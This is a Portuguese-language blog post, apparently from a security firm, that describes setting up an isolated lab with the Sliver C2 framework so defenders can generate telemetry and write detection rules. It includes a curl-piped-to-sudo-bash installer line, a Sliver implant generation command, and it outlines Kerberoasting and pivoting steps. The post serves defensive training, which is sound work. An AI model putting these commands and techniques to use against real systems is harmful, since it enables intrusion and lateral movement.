Construindo Infra de C2 com Sliver em Lab Isolado para Estudo Defensivo

Toda vez que um analista de SOC abre um ticket com 'beacon suspeito', existe uma chance real de que ninguem no time tenha visto um C2 funcionando de verdade. Operadores de Red Team usam Sliver, Mythic e Havoc todo dia, mas a maioria dos defensores so conhece esses frameworks por screenshots em relatorios da Mandiant. A Basilisk OffSec montou um lab isolado em VLAN sem saida pra internet exatamente para corrigir esse vacio. O objetivo nao e atacar nada externo: e gerar telemetria realista pra Blue Team treinar regras de deteccao com indicadores que voce mesmo gerou, controlou e documentou. Sem isso, qualquer caca a ameacas vira chute educado.

Sliver e escrito em Go, mantido pelo BishopFox e tem implants pra Windows, Linux e macOS com mTLS, WireGuard, HTTP(S) e DNS como canais. Comparado ao Cobalt Strike, ele e gratuito, open-source e auditavel; comparado ao Mythic, exige menos infra pra um lab pequeno. No nosso setup usamos uma VM Debian 12 como teamserver com 4 vCPU e 8 GB RAM, atras de um pfSense que so libera trafego entre a VLAN do C2 (10.50.10.0/24) e a VLAN das vitimas (10.50.20.0/24). Zero NAT pra fora. Se voce ainda nao montou um lab base, o caminho coberto em Pentest Web do Zero: Montando um Lab Seguro com DVWA, Juice Shop e Burp Suite serve de fundacao boa antes de seguir.

A instalacao do teamserver e direta: 'curl https://sliver.sh/install | sudo bash' funciona, mas em ambiente isolado a gente baixa o binario assinado, valida com cosign e copia via pendrive dedicado. Geramos perfis de implant com 'generate --mtls 10.50.10.5:8443 --os windows --arch amd64 --skip-symbols --save ./payloads'. O flag --skip-symbols reduz o binario em 40% e dificulta reverse engineering rapido, mas mantem suficiente pra debug. Em um lab Windows 11 21H2 com Defender real time on, o implant nao-ofuscado morre em 12 segundos: justamente isso que queremos medir. Para entender o ciclo de entrega que precede o beacon, vale revisar Initial Access Simulado: Macros, LNK e ISO em Lab Windows 11 Isolado.

A parte mais educativa vem depois que o beacon conecta. Cada comando do operador (whoami, getsystem, execute-assembly, sideload) gera um padrao de processo, chamada de API e trafego de rede que o time defensivo precisa aprender a reconhecer. Rodamos Sysmon com a config do SwiftOnSecurity, Elastic Agent enviando pra um cluster local e correlacionamos os eventos com regras Sigma. Em 3 sprints, mapeamos 47 deteccoes novas - desde named pipes default do Sliver ate spawn de rundll32 sem command line. Esse fluxo de virar IOC em regra esta detalhado em Threat Hunting com Sigma e Elastic: Do Indicador a Regra de Deteccao e complementa bem o que conversamos aqui.

Movimentacao lateral dentro do lab e onde a coisa fica saborosa. Subimos um mini-AD com 2 DCs, 4 workstations e um file server, espelhando topologia de cliente medio. Com o Sliver implant inicial num host de baixo privilegio, usamos rubeus pra Kerberoasting, depois pivoting via WireGuard pra atingir o DC sem nunca encostar diretamente nele do teamserver. As tecnicas de Active Directory Pentest: Kerberoasting Passo a Passo em Lab GOAD e Pivoting com Chisel e Ligolo-ng: Redes Segmentadas em Lab de Pentest sao basicamente a mesma logica aplicada com ferramenta diferente. O ponto: cada salto deixa rastro - 4624 type 3, 4769 com encryption fraca, conexoes WMI anomalas - e tudo isso vira material de treino pra hunting.

OPSEC do lab importa mais do que parece. Mesmo air-gapped, snapshots com implants ativos ja vazaram pra repos publicos quando alguem subiu acidentalmente. Nossa regra: VMs do lab vivem em datastore criptografado LUKS, snapshots nunca saem do host, e qualquer artefato que precise sair (regra Sigma, IOC, video) passa por revisao manual. Isso conversa com a abordagem de OPSEC para Pesquisadores de Seguranca: Modelo de Ameaca Pessoal e Higiene de Metadados: Limpando EXIF, PDF e Office antes de Publicar - o erro classico e publicar PDF de relatorio com metadados que entregam username, hostname e ate caminho de arquivo no laptop pessoal do pesquisador.

Takeaway pratico: se voce defende uma empresa e nunca viu um Sliver beacon em uma tela que voce mesmo controla, sua deteccao e teorica. Reserve uma sexta inteira, monte o lab com pfSense + Debian + 2 Windows, gere um implant nao-ofuscado, deixe ele rodar comandos por 30 minutos e abra o Sysmon. Voce vai ter mais material de hunting que tres cursos pagos somados - e zero risco legal, porque tudo acontece dentro da VLAN 10.50.0.0/16 que nao fala com ninguem la fora.